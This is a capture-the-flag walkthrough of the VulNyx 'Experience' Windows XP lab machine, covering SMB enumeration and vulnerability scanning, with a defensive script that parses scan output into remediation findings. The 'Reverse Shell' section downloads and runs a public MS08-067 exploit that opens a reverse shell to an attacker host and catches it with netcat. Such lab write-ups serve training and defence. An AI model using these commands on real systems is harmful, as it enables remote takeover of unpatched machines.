VulNyx - Experience
Information
Experience is a low-difficulty vulnerable Windows virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox hypervisor.

Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.139
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 10:41 CEST
Nmap scan report for 192.168.1.139
Host is up (0.00016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
❯ nmap -sVC -p135,139,445 192.168.1.139
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 10:42 CEST
Nmap scan report for 192.168.1.139
Host is up (0.00081s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
MAC Address: 08:00:27:9A:D1:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 13h29m57s, deviation: 4h56m59s, median: 9h59m57s
|_nbstat: NetBIOS name: EXPERIENCE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:9a:d1:bd (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: experience
| NetBIOS computer name: EXPERIENCE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-06-03T11:43:00-07:00
Shell (NT AUTHORITY\SYSTEM)
445/TCP (SMB)
Basic Enumeration
❯ netexec smb 192.168.1.139
SMB 192.168.1.139 445 EXPERIENCE [*] Windows 5.1 x32 (name:EXPERIENCE) (domain:experience) (signing:False) (SMBv1:True)
Shares
Null Session
❯ smbclient -NL //192.168.1.139
session setup failed: NT_STATUS_INVALID_PARAMETER
❯ smbmap --no-banner -H 192.168.1.139 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[!] Access denied on 192.168.1.139, no fun for you...
[*] Closed 1 connections
❯ netexec smb 192.168.1.139 -u '' -p '' --shares
SMB 192.168.1.139 445 EXPERIENCE [*] Windows 5.1 x32 (name:EXPERIENCE) (domain:experience) (signing:False) (SMBv1:True)
SMB 192.168.1.139 445 EXPERIENCE [+] experience\:
SMB 192.168.1.139 445 EXPERIENCE [-] Error enumerating shares: STATUS_ACCESS_DENIED
RPC
Null Session
❯ rpcclient -NU "" 192.168.1.139 -c "srvinfo"
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
MS08-067 (CVE-2008-4250)
Check
❯ nmap -p445 --script="smb-vuln*" 192.168.1.139
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 10:47 CEST
Nmap scan report for 192.168.1.139
Host is up (0.0012s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:9A:D1:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
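The two checks above (the netexec banner reporting SMBv1 enabled with signing disabled, and the nmap smb-vuln scripts flagging MS17-010 and MS08-067) are the evidence a defender needs to triage this host. The following script is an added example, not part of the original writeup or of nmap/netexec: it parses those outputs into a findings list with a remediation action per finding. The sample text is a constructed, trimmed copy of the output shown on this page with nmap's indentation reconstructed; the finding ids, severities and actions are my own labels.

```python
import re

# Constructed sample: trimmed copy of the nmap host-script output shown in the
# writeup, with nmap's normal indentation restored.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
"""

# Constructed sample: the netexec banner line from the writeup.
SAMPLE_NETEXEC_LINE = ("SMB 192.168.1.139 445 EXPERIENCE [*] Windows 5.1 x32 "
                       "(name:EXPERIENCE) (domain:experience) (signing:False) (SMBv1:True)")

# A script header is "| name:" or "|_name:"; sub-lines are indented further, so
# they never match this pattern.
_SCRIPT_HEADER = re.compile(r'^\|(?:_| )([A-Za-z0-9-]+):\s*(.*)$')
_CVE = re.compile(r'CVE-\d{4}-\d+')


def parse_nmap_host_scripts(text):
    """Group nmap host-script output by script name: {name: {"value", "lines"}}."""
    scripts = {}
    current = None
    for line in text.splitlines():
        head = _SCRIPT_HEADER.match(line)
        if head:
            current = head.group(1)
            scripts[current] = {"value": head.group(2).strip(), "lines": []}
        elif current and line.startswith("|"):
            scripts[current]["lines"].append(line.lstrip("|_ ").rstrip())
    return scripts


def parse_netexec_banner(line):
    """Extract the (key:value) flags netexec prints in its SMB banner line."""
    flags = dict(re.findall(r'\((\w+):([^)]*)\)', line))
    return {
        "name": flags.get("name"),
        "signing": flags.get("signing") == "True",
        "smbv1": flags.get("SMBv1") == "True",
    }


def build_findings(scripts, banner=None):
    """Turn parsed scanner output into triage findings with a remediation action."""
    findings = []
    for name, body in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        joined = "\n".join(body["lines"])
        if "State: VULNERABLE" in joined:
            findings.append({
                "id": name,
                "cves": sorted(set(_CVE.findall(joined))),
                "severity": "critical",
                "action": "isolate host; patch or decommission (XP is out of support)",
            })
    sec = scripts.get("smb-security-mode")
    if sec and "message_signing: disabled" in "\n".join(sec["lines"]):
        findings.append({
            "id": "smb-signing-disabled", "cves": [], "severity": "medium",
            "action": "require SMB signing via policy",
        })
    if banner and banner["smbv1"]:
        findings.append({
            "id": "smbv1-enabled", "cves": [], "severity": "high",
            "action": "disable SMBv1; block TCP/445 from untrusted networks",
        })
    return findings


if __name__ == "__main__":
    scripts = parse_nmap_host_scripts(SAMPLE_NMAP_OUTPUT)
    banner = parse_netexec_banner(SAMPLE_NETEXEC_LINE)
    for f in build_findings(scripts, banner):
        print(f"[{f['severity']:8}] {f['id']:22} {','.join(f['cves']) or '-':15} {f['action']}")
```

Feeding the real output of `nmap -p445 --script="smb-vuln*"` and `netexec smb` into the two parsers gives the same findings list; the parsers rely only on the header/indentation convention nmap uses for host scripts and the `(key:value)` groups netexec prints.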
Reverse Shell
I use the following exploit to try to obtain a reverse shell.
❯ wget -q "https://gist.githubusercontent.com/jrmdev/5881544269408edde11335ea2b5438de/raw/000546fe015a92e7837d4a82def7c90020d39b08/ms08-067.py"
❯ python3 ms08-067.py 192.168.1.139 6 445 192.168.1.5 443
[ASCII-art banner printed by ms08-067.py]
Windows XP SP3 English (NX)
[+] Generating shellcode ...
[+] Initiating connection ...
[+] Connected to ncacn_np:192.168.1.139[\pipe\browser]
[+] Please start a netcat listener: nc -lvp 443, press enter to continue ...
I get the shell, but I cannot verify the current user because the whoami binary does not exist on the system.
❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.139] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
Querying the %USERNAME% environment variable does not show the user either, so I serve the whoami.exe binary from my local machine over SMB and confirm that I am the user NT AUTHORITY\SYSTEM.
C:\WINDOWS\system32>echo %USERNAME%
%USERNAME%
❯ find / -name whoami.exe 2>/dev/null
/usr/share/windows-resources/binaries/whoami.exe
❯ cp /usr/share/windows-resources/binaries/whoami.exe .
❯ impacket-smbserver a . -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
C:\WINDOWS\system32>\\192.168.1.5\a\whoami.exe
NT AUTHORITY\SYSTEM
Flags
Now, as the user NT AUTHORITY\SYSTEM, I can read the user.txt and root.txt flags.
C:\>type c:\"Documents and Settings"\bill\Desktop\user.txt
f9e2****************************
C:\>type c:\"Documents and Settings"\bill\Desktop\root.txt
type c:\"Documents and Settings"\bill\Desktop\root.txt
c1d5****************************
That concludes the walkthrough of the Experience machine.
Happy Hacking!